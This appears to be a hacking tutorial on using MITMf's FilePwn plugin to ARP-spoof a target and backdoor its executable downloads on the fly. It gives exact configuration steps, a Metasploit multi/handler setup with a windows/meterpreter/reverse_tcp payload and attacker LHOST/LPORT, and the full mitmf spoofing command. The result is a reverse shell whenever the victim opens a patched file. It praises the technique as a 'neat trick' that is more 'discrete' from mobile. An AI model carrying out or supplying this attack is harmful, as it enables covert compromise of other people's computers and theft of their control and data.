How It Works
MITMf (if you don’t already know) is a man in the middle attack framwork. MITMf literally stands for “Man In The Middle framework.” It includes many, many different tools to help you with MitM attacks. In this case, we are automatically backdooring every downloaded executable for one specific machine. Cool, eh?
We will be ARP spoofing a Windows 8.1 VM machine in this test.
Note: This only works for HTTP sites, so you might want to use SSLstrip+ for any HTTPS sites.
Step 1: Editing the Configurations
Now that we have MITMf installed, we need to edit the config files to match our system. We will edit the config file located in /usr/share/mitmf/config/mitmf.cfg.
Scroll down until you get to the FilePwn section.
You can see that under the CompressedFiles section, there is a configuration for many useful payloads. Set the HOST variable to match your IP, but don’t change the port. Just remember the port number for the payload you want to use.
Step 2: Selecting the Target
When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case, I’m targeting a Windows 8.1 machine, so I would use WindowsIntelx86. The port number for that is 8443. Remember your payload’s port number for later.
Step 3: Set Up a Listener
We’re going to be using Metasploit as our payload listener. Type use multi/handler and then set your payload. in this case, I’m using Meterpreter.
set PAYLOAD windows/meterpreter/reverse_tcp
Set the LHOST and LPORT options…
set LHOST 10.0.2.117
set LPORT 8443 (Make sure you set the corresponding port number!)
Then exploit -j. Open up a new terminal…
Step 4: Running the Attack
To run the attack, use the following command:
mitmf –spoof –arp -i <interface> –gateway <gateway IP> –target <target IP> –filepwn
For me it would be:
mitmf –spoof –arp -i wlan0 –gateway 10.0.2.1 –target 10.0.2.15 –filepwn
Pretty soon you should be getting output like this:
If a user downloads a file, and the file is patchable. you should get some output saying “File patched successfully. Sending to target.” if it successfully backdoored. As soon as the victim opens the file, you should get a Meterpreter prompt.
If it doesn’t say it’s patched, it can’t be. Unfortunately, this tactic doesn’t work 100% of the time.
Now we know how to run a very neat trick–backdooring on the fly. This gets even better if you do this via mobile, as you will be very discrete. Don’t abuse this power. As said in the help menu for MITMf quoting Yoda, “Use wisely, young padawan.”